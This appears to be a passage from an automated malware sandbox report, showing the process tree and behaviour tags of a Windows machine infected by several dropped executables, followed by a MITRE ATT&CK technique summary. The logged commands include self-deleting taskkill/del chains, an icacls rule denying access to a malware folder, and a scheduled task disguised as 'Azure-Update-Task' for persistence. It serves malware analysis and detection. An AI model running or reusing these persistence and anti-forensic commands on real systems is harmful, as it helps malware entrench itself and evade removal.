C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun05fa3b4d2ae56e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8A7C4984\Sun05fa3b4d2ae56e.exe" & exit6⤵PID:3064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun05fa3b4d2ae56e.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2564 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\2FE6.exeC:\Users\Admin\AppData\Local\Temp\2FE6.exe1⤵
- Executes dropped EXE
PID:3184
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:3012 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2684
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:2500 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 331771565E155120F8DCDD89D9D0ADCF C2⤵PID:3932
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D0DC27297D221C74DFC78152192981472⤵PID:3328
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:2796
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD17718A914D21963C85A05FDBDC00C7 M Global\MSI00002⤵PID:1192
-
-
C:\Users\Admin\AppData\Local\Temp\6411.exeC:\Users\Admin\AppData\Local\Temp\6411.exe1⤵
- Executes dropped EXE
PID:3140
-
C:\Users\Admin\AppData\Local\Temp\AD42.exeC:\Users\Admin\AppData\Local\Temp\AD42.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\AD42.exeC:\Users\Admin\AppData\Local\Temp\AD42.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3668 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\AD42.exe"C:\Users\Admin\AppData\Local\Temp\AD42.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\AD42.exe"C:\Users\Admin\AppData\Local\Temp\AD42.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:2848 -
C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build2.exe"C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build2.exe"5⤵PID:3724
-
C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build2.exe"C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build2.exe"6⤵PID:3916
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:3344
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:3816
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:3856
-
-
-
-
-
C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build3.exe"C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build3.exe"5⤵PID:3924
-
C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build3.exe"C:\Users\Admin\AppData\Local\b253bcfb-a81c-4099-8702-746bcd6d4f20\build3.exe"6⤵PID:4076
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:2376
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\238B.exeC:\Users\Admin\AppData\Local\Temp\238B.exe1⤵
- Executes dropped EXE
PID:2140 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\238B.exe"2⤵PID:3268
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3384
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4DE5B899-133B-4CC4-984D-C8B395C26FF7} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:2816
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:2388
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3844
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:1176
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:3316
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8696
-
-
-
C:\Users\Admin\AppData\Roaming\tcvhifaC:\Users\Admin\AppData\Roaming\tcvhifa2⤵PID:1868
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:8960
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7652
-
-
-
C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exeC:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exe --Task2⤵PID:9080
-
C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exeC:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exe --Task3⤵PID:3448
-
-
-
C:\Users\Admin\AppData\Roaming\tcvhifaC:\Users\Admin\AppData\Roaming\tcvhifa2⤵PID:3236
-
-
C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exeC:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exe --Task2⤵PID:2200
-
C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exeC:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exe --Task3⤵PID:9060
-
-
-
C:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exeC:\Users\Admin\AppData\Local\cf0efb36-035b-46df-ad48-214876738f7b\AD42.exe --Task2⤵PID:8780
-
-
C:\Users\Admin\AppData\Local\Temp\17C9.exeC:\Users\Admin\AppData\Local\Temp\17C9.exe1⤵PID:2536
-
C:\Users\Admin\AppData\Local\Temp\7969.exeC:\Users\Admin\AppData\Local\Temp\7969.exe1⤵PID:884
-
C:\Windows\system32\taskeng.exetaskeng.exe {98B200A7-3346-4D89-A476-365AF3DC989C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2688
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:2912
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:2720
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:2840
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:3752
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2760
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3292
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1